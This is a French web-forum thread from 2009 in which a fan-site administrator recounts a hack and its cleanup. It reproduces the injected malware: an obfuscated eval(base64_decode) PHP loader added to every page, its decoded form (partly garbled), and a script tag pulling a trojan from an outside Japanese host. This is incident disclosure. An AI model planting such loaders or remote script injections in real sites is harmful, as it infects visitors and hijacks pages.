Hacking du site

Ce topic permet d'afficher clairement les news qui sont sur le site.
Règles du forum
Ce topic permet à tous le monde de créer ses news. Celles-ci seront directement afficher sur le site lui même. C'est pourquoi chaque news devra être validée par un modérateur ou par l'administrateur avant que celle-ci n'apparaisse. Ne vous étonnez donc pas si votre news n'est pas visible immédiatement (elle le sera dans les minutes qui suivent !).

ATTENTION: Vous ne pouvez pas poster de sujet simple. Il vous faudra obligatoirement cocher la case "Annonce" (et non pas annonce globale) qui se trouve sous votre message pour que votre news soient acceptées !

Hacking du site

Message par Martial » 13 Fév 2009, 17:52

Bonjour à tous ! :+2:

L'heure est grave pour Final-RPG. En effet, vous ne le savez peut être pas, mais le site s'est fait hacker par un site japonais pas plus tard qu'avant hier ! C'est donc Mercredi que j'ai eu la surprise de voir que Final-RPG était le seul site qui chargeait la page au bout de 1 minutes et 20 secondes ^^ Croyant au départ que ma connexion était la source du problème, j'ai vite laissé tombé l'idée en pensant que cela venait d'un MOD foireux que j'avais encore installé ^^ Seulement, un détail m'intriguais. Au lieu de voir "En attente de final-rpg.com...", il y avait "En attente de "En attente de cgi35.plala.or.jp...". Curieux n'est-ce pas ? D'autant plus qu'il arrive que l'on puisse voir: "En attente de google.adsense.com" (ou un truc du genre) correspondant à la pub Google qui se trouve dans le menu de gauche. Cela signifie que le code donné par Google récupère des informations sur le site. Or, je n'ai jamais vu cette adresse de site ! O_o

Une fois le doute du hack introduit dans mon esprit, je me suis dépêché de vérifier la page d'accueil afin de voir si cette dernière a subi des changements. Malheureusement, c'était bel et bien le cas. Il a bien choisi sont moment, en pleine semaine de BAC Blanc :insulte: . Le pirate avait rajouté ceci tout en haut de la page:

Code : Tout sélectionner

<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS93YjUxNjA3L2luY2x1ZGVzL2RvY3MvYXBpL2dlc2hpL2NvcmUvY29wcGVyLnBocCcpKXtpbmNsdWRlX29uY2UoJy9ob21lL3diNTE2MDcvaW5jbHVkZXMvZG9jcy9hcGkvZ2VzaGkvY29yZS9jb3BwZXIucGhwJyk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmIWZ1bmN0aW9uX2V4aXN0cygnZGdvYmgnKSl7aWYoIWZ1bmN0aW9uX2V4aXN0cygnZ3pkZWNvZGUnKSl7ZnVuY3Rpb24gZ3pkZWNvZGUoJGQpeyRmPW9yZChzdWJzdHIoJGQsMywxKSk7JGg9MTA7JGU9MDtpZigkZiY0KXskZT11bnBhY2soJ3YnLHN1YnN0cigkZCwxMCwyKSk7JGU9JGVbMV07JGgrPTIrJGU7fWlmKCRmJjgpeyRoPXN0cnBvcygkZCxjaHIoMCksJGgpKzE7fWlmKCRmJjE2KXskaD1zdHJwb3MoJGQsY2hyKDApLCRoKSsxO31pZigkZiYyKXskaCs9Mjt9JHU9Z3ppbmZsYXRlKHN1YnN0cigkZCwkaCkpO2lmKCR1PT09RkFMU0UpeyR1PSRkO31yZXR1cm4gJHU7fX1mdW5jdGlvbiBkZ29iaCgkYil7SGVhZGVyKCdDb250ZW50LUVuY29kaW5nOiBub25lJyk7JGM9Z3pkZWNvZGUoJGIpO2lmKHByZWdfbWF0Y2goJy9cPGJvZHkvc2knLCRjKSl7cmV0dXJuIHByZWdfcmVwbGFjZSgnLyhcPGJvZHlbXlw+XSpcPikvc2knLCckMScuZ21sKCksJGMpO31lbHNle3JldHVybiBnbWwoKS4kYzt9fW9iX3N0YXJ0KCdkZ29iaCcpO319fQ==')); ?>


Ainsi que cette ligne tout en bas:

Code : Tout sélectionner

<?php
<script src=http://cgi35.plala.or.jp/BTO/data/entry/css.js></script>
?>


L'enquête pouvait désormais commencer ! On voit que la ligne rajouté tout en bas exécute un code javascript contenu dans le fichier "css.js" qui, lui-même, se trouve sur un site japonais (sur lequel je n'arrive pas à aller). Il s'avère que ce fichier est en fait un Cheval de Troie très bien détecté par Avast. Je ne sais pas si le fait de simplement aller sur le site permettrait à ce hackeur de recueillir des informations sur votre PC, mais ce fichier était quand même potentiellement dangereux.

Fort heureusement, les autres fichiers PHP ne contenaient pas cette dernière ligne. En revanche, absolument TOUS les fichiers PHP du site avait le premier code de rajouté tout en haut. Vous imaginez la chose ? Supprimer ces lignes dans chacun des fichiers à la main ?

Avant de faire quoique ce soit, je décide de m'intéresser à l'analyse de ce code. On voit en premier lieu que juste après la balise "<?php", il ouvre et referme aussitôt un commentaire. Sans doute un moyen de profiter d'un bug de script pour insérer la suite du code. En parlant de cette suite, on voit beaucoup de chiffres/lettres, mais vu comme ça, on peut pas en tirer grand chose... Cependant, il fait appelle à 2 fonctions: "eval" et "base64_decode". Un petit tour sur la doc PHP nous permet de savoir que "eval" permet d'évaluer son contenu comme un script PHP alors que "base64_decode" s'occupe de décoder la suite de chiffres/lettres qui suit. J'ai donc commencé par afficher le code décodé. Ce qui m'a donné ceci:

Code : Tout sélectionner

<?php

if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){

    $GLOBALS['sh_no']=1;

    if(file_exists('/home/wb51607/includes/docs/api/geshi/core/copper.php')){

        include_once('/home/wb51607/includes/docs/api/geshi/core/copper.php');
       
        if
(function_exists('gml')&&!function_exists('dgobh')){
       
            if
(!function_exists('gzdecode')){
           
                function gzdecode
($d){
               
                    $f
=ord(substr($d,3,1));
                   
                    $h
=10;
                    $e=0;
                   
                    if
($f&4){
                   
                        $e
=unpack('v',substr($d,10,2));
                       
                        $e
=$e[1];
                       
                        $h
+=2+$e;
                       
                   
}
                   
                    if
($f&8){
                   
                        $h
=strpos($d,chr(0),$h)+1;
                       
                   
}
                   
                    if
($f&16){
                   
                        $h
=strpos($d,chr(0),$h)+1;
                       
                   
}
                   
                    if
($f&2){
                   
                    $h
+=2;
                   
                   
}
                   
                    $u
=gzinflate(substr($d,$h));
                   
                    if
($u===FALSE){
                   
                        $u
=$d;
                   
                   
}
                   
                    return $u
;
                   
               
}
                   
           
}
         
            function dgobh
($b){
               
                Header
('Content-Encoding: none');
               
                $c
=gzdecode($b);
           
                if
(preg_match('/\]*\>)/si','$1'.gml(),$c);
           
               
}
           
                else
{
           
                return gml
().$c;
           
               
}
           
           
}
         
            ob_start
('dgobh');
         
       
}
     
   
}

}

?>


Bon, étant donné que vous ne connaissez pas vraiment le PHP, je ne vais pas décrire le fonctionnement de ce script. Retenez simplement les lignes du haut

Code : Tout sélectionner

<?php

    if
(file_exists('/home/wb51607/includes/docs/api/geshi/core/copper.php')){
   
        include_once
('/home/wb51607/includes/docs/api/geshi/core/copper.php');
       
       
//La suite du code
   
   
}

?>


Ici, il vérifie l'existence d'un fichier nommé "copper.php". S'il existe, il inclue dans la page. Comme je suis vraiment pas malin et que je vois que le fichier "copper.php" dont il se sert se trouve dans le dossier "GeShi" (coloration syntaxique du code => scripts ruby pour RPG Maker), je supprime tout le dossier le plus vite possible ! En effet, il ne faut pas qu'il relance une attaque, il est important d'agir rapidement ! Comme je l'ai déjà dit, dans ce genre de moment, ma bêtise peut atteindre des sommets et je n'ai pas fait de sauvegarde de ce fameux fichier "copper.php"... Au final, je ne sais pas quel était le fichier qu'il avait inclut dans chacune des pages du site...

Néanmoins, j'étais rassuré, je savais ce que faisais le script ! Pourtant, il n'y avait pas de quoi être rassuré... Il me manquait un détail crucial: la faille qu'il a exploitée ! Oui, ça ne sers à rien de faire tout ça s'il peut le refaire le lendemain ^^ Il fallait boucher les trous avant de procéder à la réparation !

Par contre, par où commencer ? Le site, bien que petit, possède une multitude de fichiers ! Je me suis dans un premier temps tourné vers des systèmes que j'ai moi même réalisés. Ainsi, il a fallu que je vérifie les dernières activités du livre d'or et du formulaire de contact. Mais là, rien de choquant, en même temps, je vois mal comment on pourrait envoyer un fichier via un formulaire qui n'est pas fait pour ça, surtout en vérifiant chaque donnée entrée par l'utilisateur ! (je dis pas que c'est pas possible, attention ^^ Mais je ne sais pas comment faire, donc il est difficile pour moi de boucher une faille de ce coter là). J'ai donc changé de cible en me tournant cette fois-ci sur des systèmes pré-installés. Une chose est sure, phpBB3 est quasiment sans faille, et ce n'est pas sur ce petit forum que la première faille de phpBB3 serait utilisée ^^ Seulement, j'ai installé pas mal de MODs qui, eux, peuvent être une source potentielle de danger ! Mais aucun de tous ces MODs ne permettraient d'envoyer des fichiers et la quasi totalité ne permettent pas à l'utilisateur d'envoyer des informations ! C'était tout de même une piste, mais pas celle qui risque le plus de me mener vers une résultat. Disons que c'était ma roue de secours ^^ Le deuxième système que j'ai installé est la base de ressource de RPG Maker. Vous savez, le truc qui aurait du se remplir il y a 3 ans ! lol

Eh bien sachez que j'ai été stupéfait de voir que cette partie du site n'était pas ralentie => aucun code n'a été rajouté dans ces fichiers ! De plus en plus suspect... Je me connecte à l'administration pour voir quels ont été les derniers uploads effectués. Malheureusement, rien n'a été enregistré de récent. De toute façon, les fichiers d'extension .php ne peuvent être uploadés, tout comme pour le forum alors. Ce qui veut dire que s'il a réussi à envoyer un fichier .php sur le serveur grâce à la galerie de ressource, il l'a fait de manière détourner, en utilisant un bug, il est donc normal que ces fichiers n'aient pas été enregistrés comme des fichiers uploadés.

Pas de piste dans l'historique donc. J'ai alors décidé de regarder dans l'onglet "FTP" de l'administration de la galerie des ressources. Cette onglet permet à l'administrateur d'ajouter des fichiers déjà envoyés sur le serveur grâce à un FTP dans des albums de la galerie. Dans cette onglet, on peut voir apparaître une arborescence qui correspond à celle du dossier "album". Grosse surprise lorsque j'ai vu que 2 fichiers plus qu'étrange s'y trouvaient: "1.php" et "main.inc.php". Avant de les supprimer, je prends cette fois-ci la peine de les sauvegarder pour voir ce qu'ils contenaient. C'était bel et bien l'œuvre de notre hackeur car des pubs japonaises remplissaient la page "1.php". Quant à "main.inc.php", il s'agissait d'un code à la manière de ce copiés dans tous les fichiers .php du site (vous savez, "eval(base64_decode(R6f5sd5263faDa654d6az54dAZd4654sd46a4sd6984))"). Je n'ai pas pris la peine de le décoder, mais je me doute que c'était pas pour faire quelque chose de gentil ^^

Au final, je pense toujours que ce qui a permis au pirate d'insérer des fichiers sur le serveur est la base de donnée de ressource RPG Maker. Et j'espère réellement que c'est ça car sinon le site est toujours en danger !

Je me suis empressé de sauvegarder puis supprimer toute la galerie de ressource en espérant que le massacre s'arrêtera là. Vous n'êtes donc pas prêt de la revoir ^^

Il était temps de passer à la réparation ! Comme tout le monde le sait, je suis le meilleur webmaster qu'internet ait connu (lol), et en tant que meilleur, je me devais de faire une sauvegarde complète du site ! :)) Il m'a donc été très facile de remettre le site normal, un simple copier-coller a suffit. On ne peut pas en dire de même pour le forum. A force, vous savez que les MODs sur le forum sont nombreux. Qui dit MODs dit modifications de fichiers en masse ! Je ne suis jamais sur du résultat lorsque je réupload une sauvegarde des fichiers forum... De plus, le forum commençait à vieillir accumulant les bugs. J'ai alors définitivement décidé de réinstaller le forum de A à Z. Vous êtes donc sur un nouveau forum tout neuf ! Enfin, pour les fichiers, j'ai, bien entendu, restaurer les données de la base de donnée ! Vous imaginez repartir avec un forum vide ? Ben pas moi :p

Quelles sont les conséquences du renouvellement des fichiers ? Eh bien elles sont toutes mauvaises ^^ Il n'y a plus aucun MOD et le thème sur lequel j'ai longuement travaillé n'est pas prêt de revenir. Rassurez-vous, la réinstallation des MODs n'est qu'une question de temps ! Par contre, je ferais beaucoup plus attention cette fois à ne pas installer n'importe quoi. le MOD Arcade et la Shoutbox étant les priorités ! J'aimerais aussi remettre le MOD permettant d'éditer les messages sans charger la page avec l'AJAX. Ce sont les seuls MODs que je trouve utile à remettre, s'il y en a un qui vous manque, n'hésitez pas à me le demander !

Cette réinstallation m'a permis de trouver la raison d'un bug vraiment très gênant, celui-ci:

Code : Tout sélectionner

    General Error
    SQL ERROR [ mysql4 ]

    User wb51607 has already more than 'max_user_connections' active connections [1203]

    An sql error occurred while fetching this page. Please contact an administrator if this problem persists.


Je pense que cette erreur est dût au style X-Static (l'ancien thème) car quand j'ai réinstallé le forum, j'ai gardé ce thème. Or cette erreur réapparaissait toutes les pages quasiment ^^ Mais une fois le thème changer, je ne l'ai plus revu ! O_o (et ça fait pas de mal ^^)

Après avoir réinstaller le forum et rétablit la base de donnée, je décide d'aller voir ce que ça donne. C'est impressionnant à quel point je trouve le forum plus rapide qu'avant ! Malgré tout, il restait encore un problème, alors que le forum était très rapide, les messages, eux, s'affichaient très lentement... J'ai cherché pendant pas mal de temps d'où ça pouvait venir... Et devinez quoi ? Notre ami pirate avait encore fait des siennes ! O_o C'est quand j'ai décidé de lire un message dans la base de donnée que j'ai vu qu'à la fin de chaque message un petit bout de code familier trainait:

Code : Tout sélectionner

<?php
<script src=http://cgi35.plala.or.jp/BTO/data/entry/css.js></script>
?>


Or, lorsqu'on exporte les données dans un fichier texte, les messages sont convertis en hexadécimal ce qui fait que l'on va avoir plein de ligne de ce genre:

Code : Tout sélectionner

<?php
INSERT INTO
`forum_forums` VALUES (18, 40, 4, 5, 0x613a313a7b693a34303b613a323a7b693a303b733a393a2246696e616c2d525047223b693a313b693a303b7d7d, 0x44697363757373696f6e73206469766572736573, 0x536920766f7573206e6520736176657a20706173206fc3b920c3a9637269726520766f747265206d6573736167652c2063276573742064616e7320636520746f70696320717527696c2066617574206c65206d65747472652063617220696c207065726d657420646520732765787072696d6572206c696272656d656e742073757220746f757420636520717569206e27612070617320646520726170706f72742061766563206c6520736974652046696e616c2d5250472021, '', 7, '', '', '', 0, '', '', '', '', 7, '', 0, 1, 0, 3010, 32, 32, 8649, 6, 0x52653a204c27686f726c6f6765207061726c616e7465205e5e, 1232883521, 0x42656e6a616d696e, '', 34, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0x30, 1);

?>


Le texte étant la suite de chiffres/lettres. Pas facile de retrouver la ligne rajoutées dans tout ça... Il m'a donc fallu la traduire en héxadécimal et je remercie le PHP pour ses précieuses fonctions :drapeau: :embarasse: (bin2hex() pour ceux que ça intéressent :)) ). Ce qui m'a donné ceci:

Après, le reste c'est du gâteau ! Il a suffit de replacer cette longue suite de chiffres/lettres par un caractère vide puis de tout réinsérer dans la base de donnée ! Sur plus de 8400 messages, ce fut très long ^^ (et mon PC à souffert :oui: :p).

Voilà, maintenant vous savez tout ! Pour finir mon explication, voici un lien sur lequel je vais me pencher quelques temps lol

ICI


Et n'oubliez pas que je vous donne ce lien uniquement pour que vous vous protégiez ou que vous aidiez des gens mal informés, et non pas pour détruire le travail des autres...

Sur ce, bonne vacance à tous ! (ah oui, j'aurais presque oublié ce détail à cause de ça ^^)
L'important n'est pas de connaître mais de savoir trouver !
La gentillesse ou la franchise ? Que choisir ?
Vive les otakus !!
Retourner sur le site
Avatar de l’utilisateur
Martial
Administrateur
Administrateur
 
Message(s) : 2520
Inscription : 10 Nov 2006, 23:41
Localisation : Rambouillet
Meilleurs scores: 12

Re: Hacking du site

Message par Amathlog » 13 Fév 2009, 21:21

Mon Pauvre..
Comment ça se fait que des hackeurs s'en prenne à des sites amateurs ?
Heureusement que tu as pu éviter la catastrophe...
Bon si tu as besoin d'aide tu envoies un SOS par MP lol
Aller @+
Avatar de l’utilisateur
Amathlog
Modérateur
Modérateur
 
Message(s) : 1510
Inscription : 14 Jan 2007, 19:53
Meilleurs scores: 2

Re: Hacking du site

Message par Martial » 13 Fév 2009, 21:31

Très bonne question ^^

D'autant plus que tout laisse à penser que c'est vraiment un japonais qui a fait le coup... C'est à n'y rien comprendre :wacko:
L'important n'est pas de connaître mais de savoir trouver !
La gentillesse ou la franchise ? Que choisir ?
Vive les otakus !!
Retourner sur le site
Avatar de l’utilisateur
Martial
Administrateur
Administrateur
 
Message(s) : 2520
Inscription : 10 Nov 2006, 23:41
Localisation : Rambouillet
Meilleurs scores: 12

Re: Hacking du site

Message par Shaolan » 13 Fév 2009, 21:37

j'ai tout lu

en tout cas bravo pour avoir vu les raisons des problèmes
les codes php j'ai pas compris leur fonction mais c'est pas grave

mais une chose important : A ton avis, est ce que nos données persos ont été "volé" ?

Et aussi non, si ce n'est pas déjà fait (ce qui m'étonnerai), fais des recherches de hacking dans le but de mettre de la publicité ?

Je te conseille de regardé encore les données de ta BDD pour voir s'il non rien rajouté dedans

Si tu as besoin d'aide pour réorganiser ou pour chercher d'autres traces de hacking, je suis là.

(Je me disais bien aussi que le forum se comporter bizarrement depuis quelques jours)
Avatar de l’utilisateur
Shaolan
Maitre
Maitre
 
Message(s) : 1710
Inscription : 25 Déc 2006, 21:37

Re: Hacking du site

Message par Martial » 13 Fév 2009, 23:43

Oui, je pense que tous mes mots de passe sont éventés, il faut que je me dépêche de les changer au plus vite, mais c'est pas aussi simple ce genre. Mais ce n'est pas aussi simple que ça en à l'air, pour la base de donnée, on peut pas changer sont mot de passe comme ça, il faut faire la demande et que celle-ci soit acceptée... En attendant, je fais des sauvegarde régulières des données du site en cas de gros crash.

Pour la base de donnée, je crois que tu as raison, il est fort possible que des données supplémentaires aient été entrée. Pour l'arcade par exemple, après avoir tout réinstallé, je me trouve avec un problème assez bizarre (s'il n'y avait que ça ^^). Un joueur nommé "1" à fait un score de 187965416354 au jeu "0". Mais je crois que c'est juste un bug de synchronisation, du moins, je l'espère. Il serait impossible de vérifier chaque entrée dans toutes les tables ! Sais-tu que rien que les données du forum font 172 081 lignes ? De quoi s'amuser pendant un mois ^^

Non, le mieux serait de me prévenir si vous rencontrez le moindre ralentissement sur le site, ou bien des choses suspectes.

Quoiqu'il en soit, le temps que les choses se rétablissent, on va devoir garder uniquement ce style pour simplifier les choses.

Bon aller, je m'attaque à la Shoutbox en Ajax ! :gun2:
L'important n'est pas de connaître mais de savoir trouver !
La gentillesse ou la franchise ? Que choisir ?
Vive les otakus !!
Retourner sur le site
Avatar de l’utilisateur
Martial
Administrateur
Administrateur
 
Message(s) : 2520
Inscription : 10 Nov 2006, 23:41
Localisation : Rambouillet
Meilleurs scores: 12

Re: Hacking du site

Message par DeathstaR » 14 Fév 2009, 20:01

mais quels farceurs ces japonnais ! :retourne:
Avatar de l’utilisateur
DeathstaR
Membre d'honneur
Membre d'honneur
 
Message(s) : 630
Inscription : 06 Nov 2007, 14:25
Localisation : j'y suis
Meilleurs scores: 2

Re: Hacking du site

Message par Martial » 27 Fév 2009, 17:35

Chose étrange, je viens d'essayer d'accéder à ffshrine.org via Google mais Google a répertorié ce site comme un site malveillant. Je me suis demandé pourquoi et je suis allé voir plus de détails: Détails

Google a écrit :Quel est l'état actuel du site Web ffshrine.org ?

Ce site est considéré comme suspect et vous risquez d'endommager votre ordinateur si vous le visitez.

Une partie de ce site a été répertoriée 7 fois comme générant une activité suspecte au cours des 90 derniers jours.

Que s'est-il passé lorsque Google a visité ce site ?

Sur les 334 pages testées sur ce site au cours des 90 derniers jours, 9 page(s) a (ont) généré le téléchargement et l'installation de programmes malveillants sans l'autorisation de l'internaute. Google a visité ce site pour la dernière fois le 2009-02-23 et un contenu suspect a été détecté sur ce site pour la dernière fois le 2009-02-23.

Parmi les programmes malveillants figuraient 18 scripting exploit(s), 3 trojan(s). En moyenne, l'infection a généré 3 nouveaux processus sur l'ordinateur cible.

Le programme malveillant est hébergé sur 5 domaine(s), dont ffshrie.com/, yinjoy.net/, cgi35.plala.or.jp/bto/.

This site was hosted on 3 network(s) including AS21844 (THEPLANET), AS32748 (STEADFAST), AS19166 (ALPHARED).

Ce site a-t-il servi d'intermédiaire pour la diffusion de programmes malveillants ?

Au cours des 90 derniers jours, ffshrine.org ne semble pas avoir servi d'intermédiaire pour l'infection de sites Web.

Ce site a-t-il déjà hébergé des programmes malveillants ?

Non, ce site n'a pas hébergé de programmes malveillants au cours des 90 derniers jours.

Comment cela s'est-il produit ?

Dans certains cas, des tiers peuvent ajouter un code malveillant à des sites Web légitimes, ce qui nous amène à afficher le message d'avertissement.

Étapes suivantes :

* Revenir à la page précédente.
* Si vous êtes le propriétaire de ce site Web, vous pouvez demander une analyse de votre site à l'aide des Outils Google pour les webmasters. Pour plus d'informations sur cette procédure, consultez leCentre d'aide Google pour les webmasters.


Tiens "cgi35.plala.or.jp/bto/", ça me dit un truc ... :sorcier:

Ce site s'est donc fait hacker par le même pirate que pour Final-RPG O_o (sans compter les autres sites qui ont profités de l'occasion aussi ^^)

Ainsi, si je n'avais pas été là ou que j'avais eu du mal à réparer le site, il aurait très bien pu passer du côté obscur du point de vue de Google empêchant tout utilisateur à y accéder via le moteur de recherche O_o

Une chance, donc, que j'avais encore des sauvegardes toutes chaudes :p
L'important n'est pas de connaître mais de savoir trouver !
La gentillesse ou la franchise ? Que choisir ?
Vive les otakus !!
Retourner sur le site
Avatar de l’utilisateur
Martial
Administrateur
Administrateur
 
Message(s) : 2520
Inscription : 10 Nov 2006, 23:41
Localisation : Rambouillet
Meilleurs scores: 12

Re: Hacking du site

Message par Shaolan » 27 Fév 2009, 19:01

pas mal cette fonction de google

eh ben quel bandes de c***** ces hackers de japonnais

fodrait sur des sites de spécialistes de hacking s'il parle de ce groupe afin de voir exactement leur mode de hacking et de voir s'il n'y a pas encore quelques traces de leur passage

EDIT : petite histoire marrante d'un hacker XD
http://www.infos-du-net.com/actualite/15272-Hacker-McKinnon-NASA.html#xtor=RSS-31
Avatar de l’utilisateur
Shaolan
Maitre
Maitre
 
Message(s) : 1710
Inscription : 25 Déc 2006, 21:37

Re: Hacking du site

Message par Martial » 28 Fév 2009, 00:27

O_o

70 ans ! Il va la connaitre par cœur la prison ^^
L'important n'est pas de connaître mais de savoir trouver !
La gentillesse ou la franchise ? Que choisir ?
Vive les otakus !!
Retourner sur le site
Avatar de l’utilisateur
Martial
Administrateur
Administrateur
 
Message(s) : 2520
Inscription : 10 Nov 2006, 23:41
Localisation : Rambouillet
Meilleurs scores: 12


Retour vers News

Qui est en ligne ?

Utilisateur(s) parcourant ce forum : Aucun utilisateur inscrit et 7 invité(s)

cron